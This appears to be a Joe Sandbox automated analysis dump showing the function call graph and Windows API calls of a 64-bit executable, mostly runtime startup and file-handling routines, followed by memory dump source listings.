39121->39123 39122 7ff6aa1a5708 237 API calls 39122->39124 39123->39065 39123->39066 39123->39067 39123->39072 39123->39085 39123->39099 39123->39121 39123->39124 39124->39061 39124->39063 39124->39074 39124->39077 39124->39083 39124->39088 39124->39090 39124->39091 39124->39094 39124->39096 39124->39100 39124->39101 39124->39102 39124->39105 39124->39108 39124->39109 39124->39110 39124->39111 39124->39112 39124->39113 39124->39114 39124->39115 39124->39116 39124->39117 39124->39118 39124->39119 39124->39120 39124->39122 39124->39123 39127 7ff6aa1aa250 237 API calls 39124->39127 39128 7ff6aa1aaae0 237 API calls 39124->39128 39129 7ff6aa190d60 237 API calls 39124->39129 39125->39060 39126->39055 39127->39124 39128->39123 39129->39123 39131 7ff6aa1b34f6 39130->39131 39133 7ff6aa181893 39131->39133 39198 7ff6aa1cdac0 CompareStringW 39131->39198 39133->39002 39133->39010 39136 7ff6aa18546f setbuf 39134->39136 39135 7ff6aa18554a __scrt_fastfail 39139 7ff6aa1cc0a8 10 API calls 39135->39139 39136->39135 39152 7ff6aa185588 __scrt_fastfail 39136->39152 39138 7ff6aa185583 39228 7ff6aa186eb8 39138->39228 39140 7ff6aa185576 39139->39140 39143 7ff6aa18681c 54 API calls 39140->39143 39143->39138 39144 7ff6aa1856e9 39235 7ff6aa1c6f68 39144->39235 39146 7ff6aa1856f6 39147 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39146->39147 39148 7ff6aa1819df 39147->39148 39154 7ff6aa1872c4 39148->39154 39152->39138 39199 7ff6aa183210 39152->39199 39205 7ff6aa197088 39152->39205 39209 7ff6aa18681c 39152->39209 39220 7ff6aa1c7a24 39152->39220 39239 7ff6aa18571c 39152->39239 39247 7ff6aa194380 14 API calls 39152->39247 39155 7ff6aa1872eb 39154->39155 39357 7ff6aa1988dc 39155->39357 39157 7ff6aa187302 39361 7ff6aa1b915c 39157->39361 39159 7ff6aa18730f 39373 7ff6aa1b7044 39159->39373 39162 7ff6aa1da444 new 4 API calls 39163 7ff6aa1873e3 39162->39163 39164 7ff6aa1873f5 __scrt_fastfail 39163->39164 39378 7ff6aa1a894c 39163->39378 39166 7ff6aa199be0 14 API calls 39164->39166 39167 7ff6aa181a01 39166->39167 39167->39021 39169 7ff6aa187539 39168->39169 39404 7ff6aa1b922c 39169->39404 39173 7ff6aa196d45 39172->39173 39174 7ff6aa196cbc 39172->39174 39175 7ff6aa196d83 39173->39175 39177 7ff6aa196d69 39173->39177 39420 7ff6aa1b9f78 8 API calls 2 library calls 39173->39420 39176 7ff6aa196cd9 39174->39176 39415 7ff6aa1b9f78 8 API calls 2 library calls 39174->39415 39175->39032 39179 7ff6aa196cf3 39176->39179 39416 7ff6aa1b9f78 8 API calls 2 library calls 39176->39416 39177->39175 39421 7ff6aa1b9f78 8 API calls 2 library calls 39177->39421 39182 7ff6aa196d0d 39179->39182 39417 7ff6aa1b9f78 8 API calls 2 library calls 39179->39417 39184 7ff6aa196d2b 39182->39184 39418 7ff6aa1b9f78 8 API calls 2 library calls 39182->39418 39184->39175 39419 7ff6aa1b9f78 8 API calls 2 library calls 39184->39419 39189 7ff6aa187167 39188->39189 39190 7ff6aa187162 39188->39190 39422 7ff6aa186c64 130 API calls _UnwindNestedFrames 39190->39422 39192->39009 39193->39001 39194->39003 39195->39011 39196->39015 39197->39013 39198->39133 39200 7ff6aa1832e9 39199->39200 39201 7ff6aa183231 39199->39201 39200->39152 39201->39200 39248 7ff6aa194380 14 API calls 39201->39248 39203 7ff6aa18329c 39203->39200 39249 7ff6aa1a2a20 22 API calls 2 library calls 39203->39249 39206 7ff6aa1970a4 39205->39206 39207 7ff6aa1970c5 39206->39207 39250 7ff6aa1a8558 10 API calls 2 library calls 39206->39250 39207->39152 39251 7ff6aa186714 39209->39251 39211 7ff6aa186836 39212 7ff6aa186853 39211->39212 39262 7ff6aa1e48c0 31 API calls _invalid_parameter_noinfo 39211->39262 39212->39152 39214 7ff6aa18684b 39214->39212 39215 7ff6aa1868a9 std::bad_alloc::bad_alloc 39214->39215 39263 7ff6aa1dba34 RtlPcToFileHeader RaiseException 39215->39263 39217 7ff6aa1868c4 39264 7ff6aa187188 12 API calls 39217->39264 39219 7ff6aa1868eb 39219->39152 39221 7ff6aa1c7a4f 39220->39221 39225 7ff6aa1c7a59 39220->39225 39221->39152 39222 7ff6aa1c7a7c 39301 7ff6aa1cb6d0 73 API calls _Init_thread_footer 39222->39301 39225->39221 39225->39222 39226 7ff6aa1c7b1c 60 API calls 39225->39226 39269 7ff6aa1c71fc 39225->39269 39302 7ff6aa1941b0 14 API calls 2 library calls 39225->39302 39226->39225 39229 7ff6aa186ee6 39228->39229 39234 7ff6aa186f5c 39228->39234 39350 7ff6aa1c9f64 8 API calls memcpy_s 39229->39350 39231 7ff6aa186efb 39232 7ff6aa186f2f 39231->39232 39231->39234 39232->39231 39351 7ff6aa187188 12 API calls 39232->39351 39234->39144 39236 7ff6aa1c6fb4 39235->39236 39237 7ff6aa1c6f8a 39235->39237 39237->39236 39238 7ff6aa1a4538 FindClose 39237->39238 39238->39237 39240 7ff6aa185742 39239->39240 39245 7ff6aa18575d 39239->39245 39240->39245 39356 7ff6aa1b3520 12 API calls 2 library calls 39240->39356 39244 7ff6aa1857fc 39244->39152 39352 7ff6aa1b3610 39245->39352 39246 7ff6aa1b48bc 8 API calls 39246->39244 39247->39152 39248->39203 39249->39200 39250->39206 39252 7ff6aa186738 39251->39252 39261 7ff6aa1867a7 memcpy_s 39251->39261 39253 7ff6aa186765 39252->39253 39265 7ff6aa19ca6c 48 API calls 3 library calls 39252->39265 39254 7ff6aa1867e1 39253->39254 39256 7ff6aa186786 39253->39256 39254->39261 39268 7ff6aa19cb64 8 API calls 39254->39268 39256->39261 39267 7ff6aa19cb64 8 API calls 39256->39267 39257 7ff6aa186759 39266 7ff6aa19cb64 8 API calls 39257->39266 39261->39211 39262->39214 39263->39217 39264->39219 39265->39257 39275 7ff6aa1c7217 setbuf 39269->39275 39271 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39273 7ff6aa1c776f 39271->39273 39273->39225 39274 7ff6aa1c7453 39277 7ff6aa1c7464 39274->39277 39278 7ff6aa1c7476 39274->39278 39286 7ff6aa1c729c 39275->39286 39296 7ff6aa1c725a 39275->39296 39297 7ff6aa1c73c5 39275->39297 39310 7ff6aa1a4554 39275->39310 39276 7ff6aa1c76ef 39276->39296 39321 7ff6aa1a8558 10 API calls 2 library calls 39276->39321 39318 7ff6aa1c7c38 55 API calls 3 library calls 39277->39318 39281 7ff6aa1c7496 39278->39281 39307 7ff6aa1a4538 39278->39307 39293 7ff6aa1a4554 16 API calls 39281->39293 39281->39296 39282 7ff6aa1c7471 39282->39278 39285 7ff6aa1c7342 39285->39276 39285->39296 39299 7ff6aa1c7656 39285->39299 39319 7ff6aa194380 14 API calls 39285->39319 39287 7ff6aa1c73bb 39286->39287 39289 7ff6aa1c732e 39286->39289 39290 7ff6aa1da444 new 4 API calls 39287->39290 39289->39285 39292 7ff6aa1c734a 39289->39292 39290->39297 39291 7ff6aa1c737e 39291->39296 39317 7ff6aa19cbd0 75 API calls 39291->39317 39292->39291 39292->39296 39316 7ff6aa194380 14 API calls 39292->39316 39293->39296 39296->39271 39303 7ff6aa1a45cc 39297->39303 39298 7ff6aa1c7723 39320 7ff6aa18c214 8 API calls 2 library calls 39298->39320 39299->39276 39299->39296 39299->39298 39302->39225 39306 7ff6aa1a45ed 39303->39306 39304 7ff6aa1a46b2 39304->39274 39304->39285 39305 7ff6aa1a46ec 15 API calls 39305->39306 39306->39304 39306->39305 39308 7ff6aa1a454f 39307->39308 39309 7ff6aa1a4549 FindClose 39307->39309 39308->39281 39309->39308 39311 7ff6aa1a4570 39310->39311 39312 7ff6aa1a4574 39311->39312 39322 7ff6aa1a46ec 39311->39322 39312->39286 39315 7ff6aa1a458d FindClose 39315->39312 39316->39291 39317->39296 39318->39282 39319->39299 39320->39296 39321->39296 39323 7ff6aa1a4705 setbuf 39322->39323 39324 7ff6aa1a4733 FindFirstFileW 39323->39324 39325 7ff6aa1a47a4 FindNextFileW 39323->39325 39327 7ff6aa1a4749 39324->39327 39331 7ff6aa1a478b 39324->39331 39326 7ff6aa1a47ae GetLastError 39325->39326 39325->39331 39326->39331 39335 7ff6aa1b4534 39327->39335 39330 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39334 7ff6aa1a4587 39330->39334 39331->39330 39332 7ff6aa1a475f FindFirstFileW 39332->39331 39333 7ff6aa1a477a GetLastError 39332->39333 39333->39331 39334->39312 39334->39315 39336 7ff6aa1b4549 setbuf 39335->39336 39346 7ff6aa1b45a2 39336->39346 39347 7ff6aa1b472c CharUpperW 39336->39347 39338 7ff6aa1b4579 39348 7ff6aa1b4760 CharUpperW 39338->39348 39339 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39340 7ff6aa1a475b 39339->39340 39340->39332 39340->39333 39342 7ff6aa1b4592 39343 7ff6aa1b4629 GetCurrentDirectoryW 39342->39343 39344 7ff6aa1b459a 39342->39344 39343->39346 39349 7ff6aa1b472c CharUpperW 39344->39349 39346->39339 39347->39338 39348->39342 39349->39346 39350->39231 39351->39232 39354 7ff6aa1b3626 setbuf wcschr 39352->39354 39353 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39355 7ff6aa1857e1 39353->39355 39354->39353 39355->39244 39355->39246 39356->39245 39358 7ff6aa198919 39357->39358 39383 7ff6aa1c4b14 39358->39383 39360 7ff6aa198954 __scrt_fastfail 39360->39157 39362 7ff6aa1b9199 39361->39362 39363 7ff6aa1da480 4 API calls 39362->39363 39364 7ff6aa1b91be 39363->39364 39365 7ff6aa1da444 new 4 API calls 39364->39365 39366 7ff6aa1b91cf 39365->39366 39367 7ff6aa1b91e1 39366->39367 39368 7ff6aa1988dc 8 API calls 39366->39368 39369 7ff6aa1da444 new 4 API calls 39367->39369 39368->39367 39370 7ff6aa1b91f7 39369->39370 39371 7ff6aa1988dc 8 API calls 39370->39371 39372 7ff6aa1b9209 39370->39372 39371->39372 39372->39159 39374 7ff6aa1988dc 8 API calls 39373->39374 39375 7ff6aa1b7063 39374->39375 39376 7ff6aa1b72c0 4 API calls 39375->39376 39377 7ff6aa187325 39376->39377 39377->39162 39377->39164 39388 7ff6aa1c7d80 39378->39388 39384 7ff6aa1c4b26 39383->39384 39385 7ff6aa1c4b2b 39383->39385 39387 7ff6aa1c4b38 8 API calls _UnwindNestedFrames 39384->39387 39385->39360 39387->39385 39395 7ff6aa1c8094 39388->39395 39391 7ff6aa1a8a44 39392 7ff6aa1a8a5a __scrt_fastfail 39391->39392 39399 7ff6aa1cbac4 39392->39399 39396 7ff6aa1c809f 39395->39396 39397 7ff6aa1c7ec8 68 API calls 39396->39397 39398 7ff6aa1a896e 39397->39398 39398->39391 39402 7ff6aa1cba70 GetCurrentProcess GetProcessAffinityMask 39399->39402 39403 7ff6aa1a89c5 39402->39403 39403->39164 39407 7ff6aa1b9245 39404->39407 39406 7ff6aa1b92b1 39413 7ff6aa1a6194 72 API calls 39406->39413 39412 7ff6aa1a6194 72 API calls 39407->39412 39409 7ff6aa1b92bd 39414 7ff6aa1a6194 72 API calls 39409->39414 39411 7ff6aa1b92c9 39412->39406 39413->39409 39414->39411 39415->39176 39416->39179 39417->39182 39418->39184 39419->39173 39420->39177 39421->39175 39422->39189 39423 7ff6aa183b53 39424 7ff6aa183b64 39423->39424 39474 7ff6aa1a1e80 39424->39474 39425 7ff6aa183c09 39486 7ff6aa1a23f0 39425->39486 39427 7ff6aa183c18 39491 7ff6aa188050 157 API calls 39427->39491 39428 7ff6aa183bb6 39428->39425 39428->39427 39431 7ff6aa183c01 39428->39431 39430 7ff6aa183c90 39501 7ff6aa1cd400 48 API calls 39430->39501 39433 7ff6aa1a1c24 12 API calls 39431->39433 39432 7ff6aa183c3d 39492 7ff6aa188010 13 API calls 39432->39492 39433->39425 39435 7ff6aa183ccc 39435->39430 39499 7ff6aa1a2414 61 API calls 39435->39499 39436 7ff6aa183c45 39439 7ff6aa183c54 39436->39439 39493 7ff6aa19cba8 75 API calls 39436->39493 39494 7ff6aa18a9d4 186 API calls wcschr 39439->39494 39440 7ff6aa183cf9 39500 7ff6aa1a1998 138 API calls 39440->39500 39444 7ff6aa183d10 39446 7ff6aa1a18ac 15 API calls 39444->39446 39445 7ff6aa183c5c 39495 7ff6aa1893ac 8 API calls 39445->39495 39446->39430 39448 7ff6aa183c66 39449 7ff6aa183c77 39448->39449 39496 7ff6aa19ca40 61 API calls _CxxThrowException 39448->39496 39497 7ff6aa188090 8 API calls 39449->39497 39452 7ff6aa183c7f 39452->39430 39498 7ff6aa19ca40 61 API calls _CxxThrowException 39452->39498 39475 7ff6aa1a1e95 setbuf 39474->39475 39476 7ff6aa1a1ecb CreateFileW 39475->39476 39477 7ff6aa1a1f59 GetLastError 39476->39477 39478 7ff6aa1a1fb8 39476->39478 39479 7ff6aa1b4534 10 API calls 39477->39479 39480 7ff6aa1a1ff7 39478->39480 39482 7ff6aa1a1fd9 SetFileTime 39478->39482 39481 7ff6aa1a1f74 39479->39481 39483 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39480->39483 39481->39478 39484 7ff6aa1a1f78 CreateFileW GetLastError 39481->39484 39482->39480 39485 7ff6aa1a203a 39483->39485 39484->39478 39485->39428 39502 7ff6aa1a24e8 39486->39502 39489 7ff6aa1a240e 39489->39435 39491->39432 39492->39436 39494->39445 39495->39448 39496->39449 39497->39452 39498->39430 39499->39440 39500->39444 39508 7ff6aa1a1af0 39502->39508 39505 7ff6aa1a23f9 39505->39489 39507 7ff6aa19ca40 61 API calls _CxxThrowException 39505->39507 39507->39489 39509 7ff6aa1a1b01 setbuf 39508->39509 39510 7ff6aa1a1b6f CreateFileW 39509->39510 39511 7ff6aa1a1b68 39509->39511 39510->39511 39512 7ff6aa1a1be1 39511->39512 39513 7ff6aa1b4534 10 API calls 39511->39513 39516 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39512->39516 39514 7ff6aa1a1bb3 39513->39514 39514->39512 39515 7ff6aa1a1bb7 CreateFileW 39514->39515 39515->39512 39517 7ff6aa1a1c14 39516->39517 39517->39505 39518 7ff6aa19ca08 10 API calls 39517->39518 39518->39505 39519 7ff6aa1e231c 39520 7ff6aa1e2342 GetModuleHandleW 39519->39520 39521 7ff6aa1e238c 39519->39521 39520->39521 39525 7ff6aa1e234f 39520->39525 39532 7ff6aa1e6938 EnterCriticalSection 39521->39532 39523 7ff6aa1e6998 fflush LeaveCriticalSection 39524 7ff6aa1e2460 39523->39524 39527 7ff6aa1e246c 39524->39527 39531 7ff6aa1e2488 11 API calls 39524->39531 39525->39521 39533 7ff6aa1e24d4 GetModuleHandleExW 39525->39533 39526 7ff6aa1e2410 39526->39523 39528 7ff6aa1e43b8 16 API calls 39528->39526 39530 7ff6aa1e2396 39530->39526 39530->39528 39531->39527 39534 7ff6aa1e2525 39533->39534 39535 7ff6aa1e24fe GetProcAddress 39533->39535 39536 7ff6aa1e2535 39534->39536 39537 7ff6aa1e252f FreeLibrary 39534->39537 39535->39534 39538 7ff6aa1e2518 39535->39538 39536->39521 39537->39536 39538->39534 39539 7ff6aa1db0fc 39558 7ff6aa1daa8c 39539->39558 39543 7ff6aa1db123 __scrt_acquire_startup_lock 39544 7ff6aa1db148 39543->39544 39614 7ff6aa1db52c 7 API calls __scrt_fastfail 39543->39614 39548 7ff6aa1db169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39544->39548 39566 7ff6aa1e472c 39544->39566 39547 7ff6aa1db16d 39548->39547 39549 7ff6aa1db1f7 39548->39549 39615 7ff6aa1e2574 35 API calls __FrameUnwindToState 39548->39615 39570 7ff6aa1e3fc4 39549->39570 39556 7ff6aa1db220 39616 7ff6aa1dac64 8 API calls 2 library calls 39556->39616 39559 7ff6aa1daaae __isa_available_init 39558->39559 39617 7ff6aa1de2f8 39559->39617 39562 7ff6aa1daab7 39562->39543 39613 7ff6aa1db52c 7 API calls __scrt_fastfail 39562->39613 39568 7ff6aa1e4744 39566->39568 39567 7ff6aa1e4766 39567->39548 39568->39567 39666 7ff6aa1db010 39568->39666 39571 7ff6aa1e3fd4 39570->39571 39572 7ff6aa1db20c 39570->39572 39751 7ff6aa1e3c84 39571->39751 39574 7ff6aa1b7e20 39572->39574 39783 7ff6aa1cb470 GetModuleHandleW 39574->39783 39580 7ff6aa1b7e58 SetErrorMode GetModuleHandleW 39581 7ff6aa1c48cc 21 API calls 39580->39581 39582 7ff6aa1b7e7d 39581->39582 39583 7ff6aa1c3e48 137 API calls 39582->39583 39584 7ff6aa1b7e90 39583->39584 39585 7ff6aa193d3c 126 API calls 39584->39585 39586 7ff6aa1b7e9c 39585->39586 39587 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39586->39587 39588 7ff6aa1b7ead 39587->39588 39589 7ff6aa193f18 70 API calls 39588->39589 39590 7ff6aa1b7ebf 39588->39590 39589->39590 39591 7ff6aa194d1c 157 API calls 39590->39591 39592 7ff6aa1b7ed6 39591->39592 39593 7ff6aa1b7eef 39592->39593 39595 7ff6aa196ad0 154 API calls 39592->39595 39594 7ff6aa194d1c 157 API calls 39593->39594 39596 7ff6aa1b7eff 39594->39596 39597 7ff6aa1b7ee7 39595->39597 39598 7ff6aa1b7f0d 39596->39598 39601 7ff6aa1b7f14 39596->39601 39599 7ff6aa194e48 160 API calls 39597->39599 39600 7ff6aa1cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39598->39600 39599->39593 39600->39601 39602 7ff6aa194888 58 API calls 39601->39602 39603 7ff6aa1b7f57 39602->39603 39604 7ff6aa194fd0 268 API calls 39603->39604 39606 7ff6aa1b7f5f 39604->39606 39605 7ff6aa1b7f9e 39611 7ff6aa1db684 GetModuleHandleW 39605->39611 39606->39605 39607 7ff6aa1b7f8c 39606->39607 39608 7ff6aa1cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39607->39608 39609 7ff6aa1b7f93 39608->39609 39609->39605 39610 7ff6aa1cb57c 14 API calls 39609->39610 39610->39605 39612 7ff6aa1db698 39611->39612 39612->39556 39613->39543 39614->39544 39615->39549 39616->39547 39618 7ff6aa1de301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39617->39618 39630 7ff6aa1deb08 39618->39630 39621 7ff6aa1daab3 39621->39562 39625 7ff6aa1e45e4 39621->39625 39623 7ff6aa1de318 39623->39621 39637 7ff6aa1deb50 DeleteCriticalSection 39623->39637 39627 7ff6aa1e9d4c 39625->39627 39626 7ff6aa1daac0 39626->39562 39629 7ff6aa1de32c 8 API calls 3 library calls 39626->39629 39627->39626 39654 7ff6aa1e66c0 39627->39654 39629->39562 39631 7ff6aa1deb10 39630->39631 39633 7ff6aa1deb41 39631->39633 39634 7ff6aa1de30b 39631->39634 39638 7ff6aa1de678 39631->39638 39643 7ff6aa1deb50 DeleteCriticalSection 39633->39643 39634->39621 39636 7ff6aa1de8a4 8 API calls 3 library calls 39634->39636 39636->39623 39637->39621 39644 7ff6aa1de34c 39638->39644 39641 7ff6aa1de6cf InitializeCriticalSectionAndSpinCount 39642 7ff6aa1de6bb 39641->39642 39642->39631 39643->39634 39645 7ff6aa1de3ad 39644->39645 39646 7ff6aa1de3b2 39644->39646 39645->39646 39647 7ff6aa1de3e5 LoadLibraryExW 39645->39647 39652 7ff6aa1de47a 39645->39652 39653 7ff6aa1de458 FreeLibrary 39645->39653 39646->39641 39646->39642 39647->39645 39649 7ff6aa1de40b GetLastError 39647->39649 39648 7ff6aa1de489 GetProcAddress 39648->39646 39650 7ff6aa1de4a1 39648->39650 39649->39645 39651 7ff6aa1de416 LoadLibraryExW 39649->39651 39650->39646 39651->39645 39652->39646 39652->39648 39653->39645 39665 7ff6aa1e6938 EnterCriticalSection 39654->39665 39656 7ff6aa1e66d0 39657 7ff6aa1e8050 32 API calls 39656->39657 39658 7ff6aa1e66d9 39657->39658 39659 7ff6aa1e66e7 39658->39659 39660 7ff6aa1e64d0 34 API calls 39658->39660 39661 7ff6aa1e6998 fflush LeaveCriticalSection 39659->39661 39663 7ff6aa1e66e2 39660->39663 39662 7ff6aa1e66f3 39661->39662 39662->39627 39664 7ff6aa1e65bc GetStdHandle GetFileType 39663->39664 39664->39659 39667 7ff6aa1db020 pre_c_initialization 39666->39667 39687 7ff6aa1e2b00 39667->39687 39669 7ff6aa1db02c pre_c_initialization 39693 7ff6aa1daad8 39669->39693 39671 7ff6aa1db045 39672 7ff6aa1db0b5 39671->39672 39673 7ff6aa1db049 _RTC_Initialize 39671->39673 39730 7ff6aa1db52c 7 API calls __scrt_fastfail 39672->39730 39698 7ff6aa1dace0 39673->39698 39675 7ff6aa1db0bf 39731 7ff6aa1db52c 7 API calls __scrt_fastfail 39675->39731 39678 7ff6aa1db05a pre_c_initialization 39701 7ff6aa1e3b0c 39678->39701 39679 7ff6aa1db0ca __scrt_initialize_default_local_stdio_options 39679->39568 39682 7ff6aa1db06a 39729 7ff6aa1db7dc RtlInitializeSListHead 39682->39729 39684 7ff6aa1db06f pre_c_initialization 39685 7ff6aa1e4818 pre_c_initialization 35 API calls 39684->39685 39686 7ff6aa1db09a pre_c_initialization 39685->39686 39686->39568 39688 7ff6aa1e2b11 39687->39688 39689 7ff6aa1e2b19 39688->39689 39732 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 39688->39732 39689->39669 39691 7ff6aa1e2b28 39733 7ff6aa1e4e1c 31 API calls _invalid_parameter_noinfo 39691->39733 39694 7ff6aa1dab96 39693->39694 39697 7ff6aa1daaf0 __scrt_initialize_onexit_tables 39693->39697 39734 7ff6aa1db52c 7 API calls __scrt_fastfail 39694->39734 39696 7ff6aa1daba0 39697->39671 39735 7ff6aa1dac90 39698->39735 39700 7ff6aa1dace9 39700->39678 39702 7ff6aa1e3b40 39701->39702 39703 7ff6aa1e3b2a 39701->39703 39742 7ff6aa1e9370 39702->39742 39740 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 39703->39740 39706 7ff6aa1e3b2f 39741 7ff6aa1e4e1c 31 API calls _invalid_parameter_noinfo 39706->39741 39709 7ff6aa1e3b72 39746 7ff6aa1e38ec 35 API calls pre_c_initialization 39709->39746 39710 7ff6aa1db066 39710->39675 39710->39682 39712 7ff6aa1e3b9c 39747 7ff6aa1e3aa8 15 API calls 2 library calls 39712->39747 39714 7ff6aa1e3bb2 39715 7ff6aa1e3bcb 39714->39715 39716 7ff6aa1e3bba 39714->39716 39749 7ff6aa1e38ec 35 API calls pre_c_initialization 39715->39749 39748 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 39716->39748 39719 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39719->39710 39720 7ff6aa1e3be7 39721 7ff6aa1e3c30 39720->39721 39722 7ff6aa1e3c17 39720->39722 39726 7ff6aa1e3bbf 39720->39726 39724 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39721->39724 39723 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39722->39723 39725 7ff6aa1e3c20 39723->39725 39724->39726 39727 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39725->39727 39726->39719 39728 7ff6aa1e3c2c 39727->39728 39728->39710 39730->39675 39731->39679 39732->39691 39733->39689 39734->39696 39736 7ff6aa1dacbf 39735->39736 39738 7ff6aa1dacb5 _onexit 39735->39738 39739 7ff6aa1e4434 34 API calls _onexit 39736->39739 39738->39700 39739->39738 39740->39706 39741->39710 39743 7ff6aa1e937d 39742->39743 39745 7ff6aa1e3b45 GetModuleFileNameA 39742->39745 39750 7ff6aa1e91b0 48 API calls 4 library calls 39743->39750 39745->39709 39746->39712 39747->39714 39748->39726 39749->39720 39750->39745 39752 7ff6aa1e3ca1 39751->39752 39753 7ff6aa1e3c98 39751->39753 39752->39572 39753->39752 39757 7ff6aa1e3ccc 39753->39757 39758 7ff6aa1e3ce5 39757->39758 39766 7ff6aa1e3caa 39757->39766 39759 7ff6aa1e9370 pre_c_initialization 48 API calls 39758->39759 39760 7ff6aa1e3cea 39759->39760 39770 7ff6aa1e978c GetEnvironmentStringsW 39760->39770 39763 7ff6aa1e3cf7 39765 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39763->39765 39765->39766 39766->39752 39769 7ff6aa1e3e78 17 API calls 2 library calls 39766->39769 39767 7ff6aa1e3d04 39768 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39767->39768 39768->39763 39769->39752 39771 7ff6aa1e97ba WideCharToMultiByte 39770->39771 39773 7ff6aa1e985e 39770->39773 39771->39773 39774 7ff6aa1e9814 39771->39774 39775 7ff6aa1e3cef 39773->39775 39776 7ff6aa1e9868 FreeEnvironmentStringsW 39773->39776 39777 7ff6aa1e4ab4 setbuf 16 API calls 39774->39777 39775->39763 39782 7ff6aa1e3d38 31 API calls 4 library calls 39775->39782 39776->39775 39778 7ff6aa1e981c 39777->39778 39779 7ff6aa1e9824 WideCharToMultiByte 39778->39779 39780 7ff6aa1e984b 39778->39780 39779->39780 39781 7ff6aa1e4a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39780->39781 39781->39773 39782->39767 39784 7ff6aa1b7e45 39783->39784 39785 7ff6aa1cb496 GetProcAddress 39783->39785 39788 7ff6aa197a68 39784->39788 39786 7ff6aa1cb4ae 39785->39786 39787 7ff6aa1cb4cb GetProcAddress 39785->39787 39786->39787 39787->39784 39789 7ff6aa197a76 39788->39789 39809 7ff6aa1e2ae4 39789->39809 39791 7ff6aa197a80 39792 7ff6aa1e2ae4 setbuf 60 API calls 39791->39792 39793 7ff6aa197a94 39792->39793 39818 7ff6aa197b44 GetStdHandle GetFileType 39793->39818 39796 7ff6aa197b44 3 API calls 39797 7ff6aa197aae 39796->39797 39798 7ff6aa197b44 3 API calls 39797->39798 39800 7ff6aa197abe 39798->39800 39799 7ff6aa197b12 39808 7ff6aa19cd78 SetConsoleCtrlHandler 39799->39808 39801 7ff6aa197aeb 39800->39801 39821 7ff6aa1e2abc 31 API calls 2 library calls 39800->39821 39801->39799 39823 7ff6aa1e2abc 31 API calls 2 library calls 39801->39823 39803 7ff6aa197adf 39822 7ff6aa1e2b40 33 API calls 3 library calls 39803->39822 39806 7ff6aa197b06 39824 7ff6aa1e2b40 33 API calls 3 library calls 39806->39824 39810 7ff6aa1e2ae9 39809->39810 39811 7ff6aa1e7ee8 39810->39811 39814 7ff6aa1e7f23 39810->39814 39825 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 39811->39825 39813 7ff6aa1e7eed 39826 7ff6aa1e4e1c 31 API calls _invalid_parameter_noinfo 39813->39826 39827 7ff6aa1e7d98 60 API calls 2 library calls 39814->39827 39817 7ff6aa1e7ef8 39817->39791 39819 7ff6aa197b61 GetConsoleMode 39818->39819 39820 7ff6aa197a9e 39818->39820 39819->39820 39820->39796 39821->39803 39822->39801 39823->39806 39824->39799 39825->39813 39826->39817 39827->39817 39828 7ff6aa183e71 39829 7ff6aa183e89 39828->39829 39830 7ff6aa183e81 39828->39830 39831 7ff6aa183edd 39829->39831 39833 7ff6aa183ea3 39829->39833 39830->39829 39839 7ff6aa1d9a14 49 API calls 39830->39839 39834 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39831->39834 39840 7ff6aa1a331c 48 API calls 2 library calls 39833->39840 39836 7ff6aa183eef 39834->39836 39837 7ff6aa183eab 39837->39831 39841 7ff6aa1863e8 8 API calls 2 library calls 39837->39841 39839->39829 39840->39837 39841->39831

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF6AA1954C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
